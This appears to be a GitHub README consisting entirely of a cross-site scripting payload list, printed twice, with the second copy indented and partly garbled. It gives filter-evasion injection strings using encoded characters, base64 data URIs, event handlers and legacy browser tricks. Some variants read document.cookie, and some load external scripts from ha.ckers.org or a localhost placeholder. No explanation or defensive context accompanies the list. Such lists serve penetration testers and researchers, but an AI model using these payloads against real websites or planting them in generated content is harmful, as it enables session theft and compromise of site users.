mstaack/xss

## xss
"></style><script>a=eval;b=alert;a(b(/ xss fired/.source));</script>'">
';alert(/xss fired/)//';alert(/xss fired/)//";alert(/xss fired/)//";alert(/xss fired/)//--></sCRipT>">'><sCRipT>alert(/xss fired/)</sCRipT>
""});});})'"--></SCRIPT>>'"</style>>'"></title>'"><marquee><h1>'"R3NW4</
h1>'"</marquee>:;'"><)<SCRIPT>prompt(/xss fired/)</SCRIPT>'"$
\';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";</SCalert(String.fromCharCode(88String.fromCharCode(88,
115, 115, 32, 66, 121, 32, 72, 51, 65, 82, 84, 95, 66, 76, 51, 51, 68),
83, 83))RIPT>\">\'><SCRIPT>alert("xss fired")</SCRIPT>


';alert(/xss fired)//\';alert(1)//";alert(2)//\";al+ert(3)//--></SCRIPT>">'><SCRIPT>alert(/xss fired/)+</SCRIPT>=&{}");}aler+t(6);function+xss(){//&q=';alert(0)//\';alert(1)//";alert(2)//\";alert+(3)//--></SCRIPT>">'+><SCRIPT>alert(/xss fired/)</SCRIPT>=&{}");}alert(6+);function+xss(){//
'|alert('xss fired')|'
'*prompt('localhost:8000
<SCRIPT>alert('xss fired');</SCRIPT>
"'/>><img+src=x onerror=prompt(/xss fired/)>
--'">"/><sVG/*_*/R3NW4/OnLoaD="window['pr\u006fmp\u0074']/*/*/('XSS')";/>
r3nw4\"'/>><svg+onload=eval(location.hash.substr(1))>#\u0077hile(\u0074rue){pr\u006fmp\u0074(/XSS/)}
‘; alert(1); var foo=’
<object data="javascript:alert('XSS')">
<isindex type=image src=1 onerror=alert('XSS')>
R3nw4_Kurdish_Hacker"><iframe/onload=alert('xss fired')>"><img src=x
onerror=prompt('xss fired');>
> \" onfocus=alert(String.fromCharCode(88,83,83,80,79,83,69,68)) autofocus>
"><svg/onload=document.location.href='https://localhost'>
R3NW4"><svg/onload=document.location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='>
<iframe
src="data:text/html;base64,PFNDUklQVD5hbGVydCgnWFNTUE9TRUQnKTs8L1NDUklQVD4="/>
11111';\u006F\u006E\u0065rror=\u0063onfirm; throw'xss fired
<img%09onerror=alert('xss fired') src=a>
<i onclick=alert(1)>Click here</i>
<h1 a=> onmouseover=location='jav\x41script\x3Aalert\x28"MK"\x29' >xxx <
0xE + 0xF
<title onpropertychange=javascript:alert('XSS')></title><title title=>
<img language=vbs src=<b onerror=alert#1/1#>
<img src="x:? title=" onerror=alert(1)//">
<img src="x:gif" onerror="eval('al'%2b'lert(0)')">
<img src="x:gif" onerror="window['al\u0065rt'] (/'XSS'/)"></img>
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTUE9TRUQnKTwvc2NyaXB0Pg==
data:text/html,<svg/onload=alert('xss fired')>
javascript:"<script>alert(document.domain)</script>"
<a href=[0x0b]" onclick=alert(1)//">click</a>
<!-- --!><input value="--><body/onload=`alert(/ R3NW4 /)//`">
<svg><script>/*&midast;&sol;alert(' R3NW4 ')&sol;&sol;*/</script></svg>
R3NW4"><a onmouseover%3D"alert('xss fired')">R3NW4
<script/%00%00v%00%00>alert(/R3NW4/)</script>
<x/style="position:absolute;top:0;width:100%;height:100%"onwheel=alert&lpar;xss fired&rpar;>R3NW4
<b "<script>alert(1)</script>">hola</b>
'"--><*2f*style><*2f*scRipt><scRipt>alert('xss fired')<*2f*scRipt>
/x"-prompt(/xss fired/)-"
'+confirm(/xss fired/)+'
<%tag style=”xss:expression(alert(123))”>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
/R3nw4"><img src=x onerror=prompt('xss fired')>
'></a></title><bod y onpageshow=prompt(/xss fired/)>
?r3nw4</script><svg/onload=alert(/xss fired/)//r3nw4
\x3cscript src=https://localhost:8000/1.js\x3e\x3c/script\x3e
@R3nw4<script>$='xss fired',alert($)< /script>-r3nw4/
"--> </script><svg/onload=';alert(/xss fired/);'>
%27%22%3E%3Csvg/onload=prompt%28/xss fired/%29%3E
'"--></style></script>"'/>><img+src=x onerror=alert(/xss fired/)><h1>R3NW4
"<img src=https://localhost:8000/1.js onerror=prompt('xss fired')><
"><h1>R3NW4&lt;script&gt;alert(1)&lt;/script&gt;
\x22\x3E\x3C\x2Fscript\x 3E\x3Cscript
src\x3Dhttps\x3A\x2F\x2Flocalhost:8000\x2F1.js\x3E
"><svg%2Fonload%3Dalert(%2Fxss fired%2F)>
<h1>R3NW4<br><br><br><br><img src=x
onerror=prompt(String.fromCharCode(47,88,83,83,80,79,83,69,68,47)) /><!--
<svg•onload=alert(/xss fired/)>
r3nw4"><svg onload=alert('xss fired')>
"])},alert('xss fired'));(function xss() {//
""});});});alert('xss fired');$('a').each(function(i){$(this).click(function(event){x({y
<svg onload=alert('xss fired')>
"><h1/onmouseover='alert(/xss fired/)'>xss fired
"+autofocus+onfocus%3D"alert('xss fired')
</script>< img src=x onerror=alert(/xss fired/)><!--
xss"/onmouseover="alert('XSSPosed')
">@r3nw4<svg%2Fonload%3Dalert(%2Fxss fired%2F)>
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
'"><svg/onload=alert(/xss fired/)>
"><img+src=a+onerror=prompt(/xss fired/)>
r3nw4"</title>'>><BoDy!><BODY onpageshow=prompt(/xss fired/)></
"/><iframe/onload=prompt(/xss fired/)>
<img src=x onerror=alert(/xss fired/)>
"><img+src%3Dx+onerror%3Dprompt('xss fired')>
"/onmouseover=alert(/xss fired/)>
"onerror=alert(/xss fired/)>
r3nw4-->hacker<svg/onload=alert('xss fired')//
"";<%2Fscript><script>prompt(%2Fxss fired%2F)<%2Fscript><"
"><--`<script>window.alert('localhost:8000script>--!>
r3nw4\'); alert("xss fired");//
"><script>setTimeout("alert(/xss fired/)",1000);</script><a x="
<video onerror=alert(1337) </poster>
<input onfocus=alert(1337) </autofocus>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('xss');</x:script>
'"/>></script><script>alert("xss fired")</script>
</script><img src=x onerror=while(true){prompt(/xss fired/)}>
<img/id="confirm&lpar;1&#x29;"/alt="/"src="/"onerror=eval(id&#x29;>
<script>x='con';s='firm';S='(1)';setTimeout(x+s+S,0);</script>
<script </src="data:,1> (alert)(1337) "">
<script src=data:;base64,YWxlcnQoMTMzNyk=>
</title><script>alert(/xss fired/)</script>
x");$=alert, $('xss fired');//
'"/>></scr ipt><script>alert("xss fired")</script>
#prettyPhoto[r3nw4]/1,<img src=x onerror=alert(/xss fired/)>/
#prettyPhoto[gallery]/1,<a onclick="alert(/xss fired/);">/
"";</script><script>prompt(/xss fired/)</script><"
-------------------------------------------------------------
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
<BASE HREF="javascript:javascript:alert(1);//">
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=javascript:javascript:alert(1)></OBJECT>
<HTML xmlns:xss><?import namespace="xss"
implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML
namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!--
-->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss"
DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t"
ns="urn:schemas-microsoft-com:time"><?import namespace="t"
implementation="#default#time2"><t:set attributeName="innerHTML"
to="XSS&lt;SCRIPT
DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML>
<SCRIPT SRC="%(jpg)s"></SCRIPT>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;
charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
<form id="test" /><button form="test"
formaction="javascript:javascript:alert(1)">X
<body
onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input
autofocus>
<P STYLE="behavior:url('#default#time2')" end="0"
onEnd="javascript:alert(1)">
<STYLE>@import'%(css)s';</STYLE>
<STYLE>a{background:url('s1' 's2)}@import
javascript:javascript:alert(1);');}</STYLE>
<meta charset=
"x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(1);></style>
<?xml version="1.0"?><html:html
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
<embed code=%(scriptlet)s></embed>
<embed code=javascript:javascript:alert(1);></embed>
<embed src=%(jscript)s></embed>
<frameset onload=javascript:javascript:alert(1)></frameset>
<object onerror=javascript:javascript:alert(1)>
<embed type="image" src=%(scriptlet)s></embed>
<XML ID=I><X><C><![CDATA[<IMG
SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(1);};>
<a href="jav&#65ascript:javascript:alert(1)">test1</a>
<a href="jav&#97ascript:javascript:alert(1)">test1</a>
<embed width=500 height=500
code="data:text/html,<script>%(payload)s</script>"></embed>
<iframe
srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
> </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<script ^__^>alert(String.fromCharCode(49))</script ^__^

</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script
&#32;

&#00;</form><input type&#61;"date" onfocus="alert(1)">

<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>


&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox &
Opera}

<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^

<div/style="width:expression(confirm(1))">X</div> {IE7}

<iframe/%00/ src=javaSCRIPT&colon;alert(1)

//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//

/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt/*iframe/src*/>

</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>

<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">

</plaintext\></|\><plaintext/onmouseover=prompt(1)
<var onmouseover="prompt(1)">On Mouse Over</var>

<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click
Here</a>

<img src="/" =_=" title="onerror='prompt(1)'">

<%<!--'%><script>alert(1);</script -->

<script src="data:text/javascript,alert(1)"></script>

<iframe/src \/\/onload = prompt(1)

<iframe/onreadystatechange=alert(1)

<svg/onload=alert(1)

<input value=<><iframe/src=javascript:confirm(1)

<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>

http://www.)</script .com

<iframe
src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>


<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>


<svg contentScriptType=text/vbs><script>MsgBox

<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a

<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE>

<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>

<script>++1-+?(1)</script>

<body/onload=&lt;!--&gt;&#10alert(1)>

<script itworksinallbrowsers>/*<script* */alert(1)</script

<img src ?itworksonchrome?\/onerror = alert(1)

<svg><script>//&NewLine;confirm(1);</script </svg>

<svg><script onlypossibleinopera:-)> alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa
href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

<script x> alert</script 1=2

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert(1)> --!>

<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>

<div style="position:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button>

<form><button formaction=javascript&colon;alert(1)>CLICKME
	"></style><script>a=eval;b=alert;a(b(/ xss fired/.source));</script>'">
	';alert(/xss fired/)//';alert(/xss fired/)//";alert(/xss fired/)//";alert(/xss fired/)//--></sCRipT>">'><sCRipT>alert(/xss fired/)</sCRipT>
	""});});})'"--></SCRIPT>>'"</style>>'"></title>'"><marquee><h1>'"R3NW4</
	h1>'"</marquee>:;'"><)<SCRIPT>prompt(/xss fired/)</SCRIPT>'"$
	\';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";</SCalert(String.fromCharCode(88String.fromCharCode(88,
	115, 115, 32, 66, 121, 32, 72, 51, 65, 82, 84, 95, 66, 76, 51, 51, 68),
	83, 83))RIPT>\">\'><SCRIPT>alert("xss fired")</SCRIPT>


	';alert(/xss fired)//\';alert(1)//";alert(2)//\";al+ert(3)//--></SCRIPT>">'><SCRIPT>alert(/xss fired/)+</SCRIPT>=&{}");}aler+t(6);function+xss(){//&q=';alert(0)//\';alert(1)//";alert(2)//\";alert+(3)//--></SCRIPT>">'+><SCRIPT>alert(/xss fired/)</SCRIPT>=&{}");}alert(6+);function+xss(){//
	'\|alert('xss fired')\|'
	'*prompt('localhost:8000
	<SCRIPT>alert('xss fired');</SCRIPT>
	"'/>><img+src=x onerror=prompt(/xss fired/)>
	--'">"/><sVG/_/R3NW4/OnLoaD="window['pr\u006fmp\u0074']///('XSS')";/>
	r3nw4\"'/>><svg+onload=eval(location.hash.substr(1))>#\u0077hile(\u0074rue){pr\u006fmp\u0074(/XSS/)}
	‘; alert(1); var foo=’
	<object data="javascript:alert('XSS')">
	<isindex type=image src=1 onerror=alert('XSS')>
	R3nw4_Kurdish_Hacker"><iframe/onload=alert('xss fired')>"><img src=x
	onerror=prompt('xss fired');>
	> \" onfocus=alert(String.fromCharCode(88,83,83,80,79,83,69,68)) autofocus>
	"><svg/onload=document.location.href='https://localhost'>
	R3NW4"><svg/onload=document.location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='>
	<iframe
	src="data:text/html;base64,PFNDUklQVD5hbGVydCgnWFNTUE9TRUQnKTs8L1NDUklQVD4="/>
	11111';\u006F\u006E\u0065rror=\u0063onfirm; throw'xss fired
	<img%09onerror=alert('xss fired') src=a>
	<i onclick=alert(1)>Click here</i>
	<h1 a=> onmouseover=location='jav\x41script\x3Aalert\x28"MK"\x29' >xxx <
	0xE + 0xF
	<title onpropertychange=javascript:alert('XSS')></title><title title=>
	<img language=vbs src=<b onerror=alert#1/1#>
	<img src="x:? title=" onerror=alert(1)//">
	<img src="x:gif" onerror="eval('al'%2b'lert(0)')">
	<img src="x:gif" onerror="window['al\u0065rt'] (/'XSS'/)"></img>
	data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTUE9TRUQnKTwvc2NyaXB0Pg==
	data:text/html,<svg/onload=alert('xss fired')>
	javascript:"<script>alert(document.domain)</script>"
	<a href=[0x0b]" onclick=alert(1)//">click</a>
	<!-- --!><input value="--><body/onload=`alert(/ R3NW4 /)//`">
	<svg><script>/&midast;/alert(' R3NW4 ')///</script></svg>
	R3NW4"><a onmouseover%3D"alert('xss fired')">R3NW4
	<script/%00%00v%00%00>alert(/R3NW4/)</script>
	<x/style="position:absolute;top:0;width:100%;height:100%"onwheel=alert(xss fired)>R3NW4
	<b "<script>alert(1)</script>">hola</b>
	'"--><2fstyle><2fscRipt><scRipt>alert('xss fired')<2fscRipt>
	/x"-prompt(/xss fired/)-"
	'+confirm(/xss fired/)+'
	<%tag style=”xss:expression(alert(123))”>
	</XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))>
	/R3nw4"><img src=x onerror=prompt('xss fired')>
	'></a></title><bod y onpageshow=prompt(/xss fired/)>
	?r3nw4</script><svg/onload=alert(/xss fired/)//r3nw4
	\x3cscript src=https://localhost:8000/1.js\x3e\x3c/script\x3e
	@R3nw4<script>$='xss fired',alert($)< /script>-r3nw4/
	"--> </script><svg/onload=';alert(/xss fired/);'>
	%27%22%3E%3Csvg/onload=prompt%28/xss fired/%29%3E
	'"--></style></script>"'/>><img+src=x onerror=alert(/xss fired/)><h1>R3NW4
	"<img src=https://localhost:8000/1.js onerror=prompt('xss fired')><
	"><h1>R3NW4<script>alert(1)</script>
	\x22\x3E\x3C\x2Fscript\x 3E\x3Cscript
	src\x3Dhttps\x3A\x2F\x2Flocalhost:8000\x2F1.js\x3E
	"><svg%2Fonload%3Dalert(%2Fxss fired%2F)>
	<h1>R3NW4<br><br><br><br><img src=x
	onerror=prompt(String.fromCharCode(47,88,83,83,80,79,83,69,68,47)) /><!--
	<svg•onload=alert(/xss fired/)>
	r3nw4"><svg onload=alert('xss fired')>
	"])},alert('xss fired'));(function xss() {//
	""});});});alert('xss fired');$('a').each(function(i){$(this).click(function(event){x({y
	<svg onload=alert('xss fired')>
	"><h1/onmouseover='alert(/xss fired/)'>xss fired
	"+autofocus+onfocus%3D"alert('xss fired')
	</script>< img src=x onerror=alert(/xss fired/)><!--
	xss"/onmouseover="alert('XSSPosed')
	">@r3nw4<svg%2Fonload%3Dalert(%2Fxss fired%2F)>
	%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
	'"><svg/onload=alert(/xss fired/)>
	"><img+src=a+onerror=prompt(/xss fired/)>
	r3nw4"</title>'>><BoDy!><BODY onpageshow=prompt(/xss fired/)></
	"/><iframe/onload=prompt(/xss fired/)>
	<img src=x onerror=alert(/xss fired/)>
	"><img+src%3Dx+onerror%3Dprompt('xss fired')>
	"/onmouseover=alert(/xss fired/)>
	"onerror=alert(/xss fired/)>
	r3nw4-->hacker<svg/onload=alert('xss fired')//
	"";<%2Fscript><script>prompt(%2Fxss fired%2F)<%2Fscript><"
	"><--`<script>window.alert('localhost:8000script>--!>
	r3nw4\'); alert("xss fired");//
	"><script>setTimeout("alert(/xss fired/)",1000);</script><a x="
	<video onerror=alert(1337) </poster>
	<input onfocus=alert(1337) </autofocus>
	<img src=x:alert(alt) onerror=eval(src) alt=0>
	<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert('xss');</x:script>
	'"/>></script><script>alert("xss fired")</script>
	</script><img src=x onerror=while(true){prompt(/xss fired/)}>
	<img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>
	<script>x='con';s='firm';S='(1)';setTimeout(x+s+S,0);</script>
	<script </src="data:,1> (alert)(1337) "">
	<script src=data:;base64,YWxlcnQoMTMzNyk=>
	</title><script>alert(/xss fired/)</script>
	x");$=alert, $('xss fired');//
	'"/>></scr ipt><script>alert("xss fired")</script>
	#prettyPhoto[r3nw4]/1,<img src=x onerror=alert(/xss fired/)>/
	#prettyPhoto[gallery]/1,<a onclick="alert(/xss fired/);">/
	"";</script><script>prompt(/xss fired/)</script><"
	-------------------------------------------------------------
	<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
	<BASE HREF="javascript:javascript:alert(1);//">
	<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
	<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
	name=url value=javascript:javascript:alert(1)></OBJECT>
	<HTML xmlns:xss><?import namespace="xss"
	implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML
	namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!--
	-->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss"
	DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
	<HTML><BODY><?xml:namespace prefix="t"
	ns="urn:schemas-microsoft-com:time"><?import namespace="t"
	implementation="#default#time2"><t:set attributeName="innerHTML"
	to="XSS<SCRIPT
	DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>
	<SCRIPT SRC="%(jpg)s"></SCRIPT>
	<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html;
	charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
	<form id="test" /><button form="test"
	formaction="javascript:javascript:alert(1)">X
	<body
	onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input
	autofocus>
	<P STYLE="behavior:url('#default#time2')" end="0"
	onEnd="javascript:alert(1)">
	<STYLE>@import'%(css)s';</STYLE>
	<STYLE>a{background:url('s1' 's2)}@import
	javascript:javascript:alert(1);');}</STYLE>
	<meta charset=
	"x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
	<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
	<style onreadystatechange=javascript:javascript:alert(1);></style>
	<?xml version="1.0"?><html:html
	xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
	<embed code=%(scriptlet)s></embed>
	<embed code=javascript:javascript:alert(1);></embed>
	<embed src=%(jscript)s></embed>
	<frameset onload=javascript:javascript:alert(1)></frameset>
	<object onerror=javascript:javascript:alert(1)>
	<embed type="image" src=%(scriptlet)s></embed>
	<XML ID=I><X><C><![CDATA[<IMG
	SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
	<IMG SRC=&{javascript:alert(1);};>
	<a href="jav&#65ascript:javascript:alert(1)">test1</a>
	<a href="jav&#97ascript:javascript:alert(1)">test1</a>
	<embed width=500 height=500
	code="data:text/html,<script>%(payload)s</script>"></embed>
	<iframe
	srcdoc="&LT;iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>">
	';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
	alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
	> </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	'';!--"<XSS>=&{()}
	<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
	<IMG SRC="javascript:alert('XSS');">
	<IMG SRC=javascript:alert('XSS')>
	<IMG SRC=JaVaScRiPt:alert('XSS')>
	<IMG SRC=javascript:alert("XSS")>
	<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
	<a onmouseover="alert(document.cookie)">xxs link</a>
	<a onmouseover=alert(document.cookie)>xxs link</a>
	<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
	<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
	<IMG SRC=# onmouseover="alert('xxs')">
	<IMG SRC= onmouseover="alert('xxs')">
	<script ^__^>alert(String.fromCharCode(49))</script ^__^

	</style ><script :-(>//alert(document.location)//</script


	</form><input type="date" onfocus="alert(1)">

	<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>


	"><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

	<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox &
	Opera}

	<marquee onstart='javascript:alert(1)'>^__^

	<div/style="width:expression(confirm(1))">X</div> {IE7}

	<iframe/%00/ src=javaSCRIPT&colon;alert(1)

	//<form/action=javascript:alert(document&period;cookie)><input/type='submit'>//

	/iframe/src/<iframe/src="<iframe/src=@"/onload=prompt/iframe/src/>

	</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>

	<a/href="javascript: javascript:prompt(1)"><input type="X">

	</plaintext\></\|\><plaintext/onmouseover=prompt(1)
	<var onmouseover="prompt(1)">On Mouse Over</var>

	<a href=javascript&colon;alert(document&period;cookie)>Click
	Here</a>

	<img src="/" =_=" title="onerror='prompt(1)'">

	<%<!--'%><script>alert(1);</script -->

	<script src="data:text/javascript,alert(1)"></script>

	<iframe/src \/\/onload = prompt(1)

	<iframe/onreadystatechange=alert(1)

	<svg/onload=alert(1)

	<input value=<><iframe/src=javascript:confirm(1)

	<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>

	http://www.)</script .com

	<iframe
	src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>


	<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>


	<svg contentScriptType=text/vbs><script>MsgBox

	<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a

	<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE>

	<object data=javascript&colon;\u0061l&#101%72t(1)>

	<script>++1-+?(1)</script>

	<body/onload=<!-->&#10alert(1)>

	<script itworksinallbrowsers>/<script */alert(1)</script

	<img src ?itworksonchrome?\/onerror = alert(1)

	<svg><script>//&NewLine;confirm(1);</script </svg>

	<svg><script onlypossibleinopera:-)> alert(1)

	<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa
	href=j&#97v&#97script:&#97lert(1)>ClickMe

